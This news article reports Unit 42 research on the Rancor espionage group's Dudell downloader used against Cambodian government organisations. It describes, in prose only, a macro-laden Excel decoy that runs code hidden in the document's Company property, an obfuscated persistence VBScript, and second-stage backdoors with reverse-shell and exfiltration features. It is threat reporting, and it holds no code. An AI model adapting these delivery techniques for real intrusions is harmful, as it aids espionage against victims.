A Chinese-linked hacking group deployed a new malware strain dubbed Dudell as part of attacks targeting Cambodian government organizations between December 2018 and January 2019.
The threat group tracked as Rancor by Palo Alto Networks’ Unit 42 is known to have operated highly-targeted cyber-espionage campaigns against other targets from South East Asia, including but not limited to Cambodia and Singapore since at least 2017.
This is not the first time Rancor was spotted using previously unknown custom malware as Unit 42 also previously observed them making use of the DDKONG and PLAINTEE families throughout attacks carried out in 2017 and 2018.
Custom malware used against government orgs
“Between early December 2018 and the end of January 2019, Rancor conducted at least two rounds of attacks intending to install Derusbi or KHRat malware on victim systems,” Unit 42 says.
The DUDELL sample discovered by Unit 42 features similar malicious behavior to another malware sample connected to Rancor found by Check Point researchers while observing a campaign against several Southeast Asian government entities that span over seven months.
Rancor malware malicious behavior
This malware downloader was delivered in the form of a decoy Microsoft Excel document designed to run malicious macros on the target’s computer with the end goal of downloading and executing a second stage malware payloads.
“The macro in this document gets executed when the user views the document and clicks Enable Content, at which point the macro locates and executes the data located under the Company field in the document’s properties,” the researchers add.
A custom obfuscated VBScript named Chrome.vbs was also used by the Rancor group hackers in attacks from July 2019 to infect their targets with “multiple chained persistent artifacts” to gain persistence on the compromised computers.
VBScript payload execution flow
Second stage malware payloads
As a second stage payload, the downloader will drop a DDKONG payload that will exfiltrate XOR encoded victim info including hostname, IP address, and locale, as well as various other OS information.
The DDKONG malware can terminate processes on the compromised hosts, list folder contents, download and upload files, execute commands, take screenshots, and even act as a reverse shell to provide the attackers with remote access to the infected systems.
DUDELL was also observed while delivering KHRAT payloads that also come with reverse shell capabilities, as well as Derusbi backdoor Trojans that will load additional modules to augment its functionality.
Unit 42 provides a list of indicators of compromise (IOCs) including command and control server addresses and malware sample SHA256 hashes at the end of their Rancor report.